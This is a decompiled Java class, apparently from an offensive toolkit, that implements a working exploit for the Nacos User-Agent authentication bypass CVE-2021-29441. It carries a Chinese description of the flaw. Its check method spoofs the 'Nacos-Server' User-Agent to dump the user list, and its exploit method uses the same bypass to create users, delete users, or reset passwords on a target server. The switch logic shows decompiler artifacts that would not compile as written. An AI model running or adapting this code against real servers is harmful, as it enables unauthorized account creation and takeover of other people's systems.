package com.alibaba.nacos.exploit;

import ch.qos.logback.core.joran.util.beans.BeanUtil;
import com.alibaba.nacos.entity.ExecutionResult;
import com.alibaba.nacos.entity.Vulnerability;
import com.alibaba.nacos.httpclient.MyHttpRequests;
import com.alibaba.nacos.httpclient.MyHttpResponse;
import com.github.kevinsawicki.http.HttpRequest;
import java.util.HashMap;
import org.apache.tomcat.util.http.fileupload.FileUploadBase;

/* loaded from: input_file:com/alibaba/nacos/exploit/Alibaba_Nacos_unauthorized_access.class */
public class Alibaba_Nacos_unauthorized_access implements Vulnerability {
    final String VulName = "Nacos User-Agent权限绕过（CVE-2021-29441）";

    @Override // com.alibaba.nacos.entity.Vulnerability
    public String getInfo() {
        getClass();
        return String.format("漏洞名称: %s\n\n漏洞描述: %s\n\n漏洞影响版本: %s\n\n漏洞修复方案: %s\n\n参考链接: %s\n\n", "Nacos User-Agent权限绕过（CVE-2021-29441）", "该漏洞发生在nacos在进行认证授权操作时，会判断请求的user-agent是否为”Nacos-Server”，如果是的话则不进行任何认证。开发者原意是用来处理一些服务端对服务端的请求。但是由于配置的过于简单，并且将协商好的user-agent设置为Nacos-Server，直接硬编码在了代码里，导致了漏洞的出现。", "Nacos <= 2.0.0-ALPHA.1", "升级到最新版本", "无");
    }

    @Override // com.alibaba.nacos.entity.Vulnerability
    public ExecutionResult check(String str) throws Exception {
        MyHttpRequests myHttpRequests = new MyHttpRequests();
        HashMap hashMap = new HashMap();
        hashMap.put("User-Agent", "Nacos-Server");
        try {
            MyHttpResponse sendRequest = myHttpRequests.sendRequest((str.endsWith("/") ? str.substring(0, str.length() - 1) : str) + "/v1/auth/users?pageNo=1&pageSize=9", "GET", null, hashMap, true);
            if (sendRequest.getResponseBody().contains("pageItems")) {
                getClass();
                return new ExecutionResult(true, "Nacos User-Agent权限绕过（CVE-2021-29441）", sendRequest.getResponseBody(), null);
            }
            getClass();
            return new ExecutionResult(false, "Nacos User-Agent权限绕过（CVE-2021-29441）", null, null);
        } catch (Exception e) {
            getClass();
            return new ExecutionResult(false, "Nacos User-Agent权限绕过（CVE-2021-29441）", null, null);
        }
    }

    @Override // com.alibaba.nacos.entity.Vulnerability
    public ExecutionResult exploit(String str, String... strArr) throws Exception {
        String[] split = strArr[0].split(" ");
        String str2 = split[1];
        MyHttpRequests myHttpRequests = new MyHttpRequests();
        HashMap hashMap = new HashMap();
        hashMap.put("User-Agent", "Nacos-Server");
        hashMap.put(FileUploadBase.CONTENT_TYPE, "application/x-www-form-urlencoded");
        try {
            String str3 = (str.endsWith("/") ? str.substring(0, str.length() - 1) : str) + "/v1/auth/users";
            boolean z = -1;
            switch (str2.hashCode()) {
                case 96417:
                    if (str2.equals(BeanUtil.PREFIX_ADDER)) {
                        z = false;
                        break;
                    }
                    break;
                case 99339:
                    if (str2.equals("del")) {
                        z = true;
                        break;
                    }
                    break;
                case 108404047:
                    if (str2.equals("reset")) {
                        z = 2;
                        break;
                    }
                    break;
            }
            switch (z) {
                case false:
                    MyHttpResponse sendRequest = myHttpRequests.sendRequest(str3, "GET", split[0], hashMap, true);
                    if (sendRequest.getResponseBody().contains("create user ok!") || sendRequest.getResponseBody().contains("already exist!")) {
                        return new ExecutionResult(true, "新增用户成功", sendRequest.getResponseBody(), null);
                    }
                    break;
                case true:
                    MyHttpResponse sendRequest2 = myHttpRequests.sendRequest(str3, HttpRequest.METHOD_DELETE, split[0], hashMap, true);
                    if (sendRequest2.getResponseBody().contains("delete user ok!")) {
                        return new ExecutionResult(true, "删除用户成功", sendRequest2.getResponseBody(), null);
                    }
                    break;
                case true:
                    MyHttpResponse sendRequest3 = myHttpRequests.sendRequest(str3, HttpRequest.METHOD_PUT, split[0], hashMap, true);
                    if (sendRequest3.getResponseBody().contains("update user ok!") || sendRequest3.getResponseBody().contains("not exist!;")) {
                        return new ExecutionResult(true, "重置密码成功", sendRequest3.getResponseBody(), null);
                    }
                    break;
            }
            getClass();
            return new ExecutionResult(false, "Nacos User-Agent权限绕过（CVE-2021-29441）", null, null);
        } catch (Exception e) {
            getClass();
            return new ExecutionResult(false, "Nacos User-Agent权限绕过（CVE-2021-29441）", null, null);
        }
    }
}
